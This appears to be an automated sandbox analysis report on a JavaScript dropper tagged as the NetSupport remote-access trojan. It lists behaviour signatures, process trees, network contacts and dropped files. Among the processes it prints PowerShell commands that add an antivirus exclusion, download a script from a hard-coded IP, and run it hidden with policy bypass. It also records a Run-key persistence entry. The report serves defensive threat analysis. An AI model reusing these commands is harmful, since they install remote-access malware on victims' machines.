Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-hj77nsba65
Target c80a26b806b3486c6157d8904c2e13e7.js
SHA256 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
Tags
netsupport persistence rat
score
10/10

Analysis Overview

score
10/10

SHA256

64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

Threat Level: Known bad

The file c80a26b806b3486c6157d8904c2e13e7.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

Process spawned unexpected child process

NetSupport

Blocklisted process makes network request

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Analysis: static1

Detonation Overview

Reported

2023-05-27 06:47

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-27 06:47

Reported

2023-05-27 06:49

Platform

win10v2004-20230220-en

Max time kernel

82s

Max time network

140s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

Signatures

NetSupport

rat netsupport

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"

Network

Country  Destination          Domain                        Proto
US       8.8.8.8:53           183.59.114.20.in-addr.arpa    udp
US       188.227.59.169:80    188.227.59.169                tcp
US       8.8.8.8:53           217.106.137.52.in-addr.arpa   udp
US       8.8.8.8:53           1.208.79.178.in-addr.arpa     udp
US       8.8.8.8:53           206.23.85.13.in-addr.arpa     udp
US       8.8.8.8:53           169.59.227.188.in-addr.arpa   udp
US       188.227.59.169:80    188.227.59.169                tcp
US       8.8.8.8:53           240.232.18.117.in-addr.arpa   udp
US       8.8.8.8:53           250.255.255.239.in-addr.arpa  udp
US       8.8.8.8:53           golden-scalen.com             udp
US       86.38.202.175:80     golden-scalen.com             tcp
US       86.38.202.175:443    golden-scalen.com             tcp
US       8.8.8.8:53           175.202.38.86.in-addr.arpa    udp
US       8.8.8.8:53           xoomep1.com                   udp
NL       80.66.88.143:1935    xoomep1.com                   tcp
US       8.8.8.8:53           geo.netsupportsoftware.com    udp
GB       62.172.138.67:80     geo.netsupportsoftware.com    tcp
US       8.8.8.8:53           67.138.172.62.in-addr.arpa    udp
US       8.8.8.8:53           143.88.66.80.in-addr.arpa     udp
US       8.8.8.8:53           97.17.167.52.in-addr.arpa     udp
US       52.168.117.169:443   N/A                           tcp
US       8.8.8.8:53           64.13.109.52.in-addr.arpa     udp
US       93.184.220.29:80     N/A                           tcp
US       8.247.210.254:80     N/A                           tcp
US       8.247.210.254:80     N/A                           tcp
NL       173.223.113.164:443  N/A                           tcp
NL       173.223.113.131:80   N/A                           tcp
US       204.79.197.203:80    N/A                           tcp

Files

C:\ProgramData\BLD.bat

C:\ProgramData\zayavka2.txt

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hv30kewd.nxy.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\archive.ps1

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.dll

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICHEK.DLL

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\MSVCR100.dll

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\NSM.LIC

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.ini

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-27 06:47

Reported

2023-05-27 06:49

Platform

win7-20230220-en

Max time kernel

31s

Max time network

33s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp

Files

C:\ProgramData\BLD.bat

C:\ProgramData\zayavka2.txt
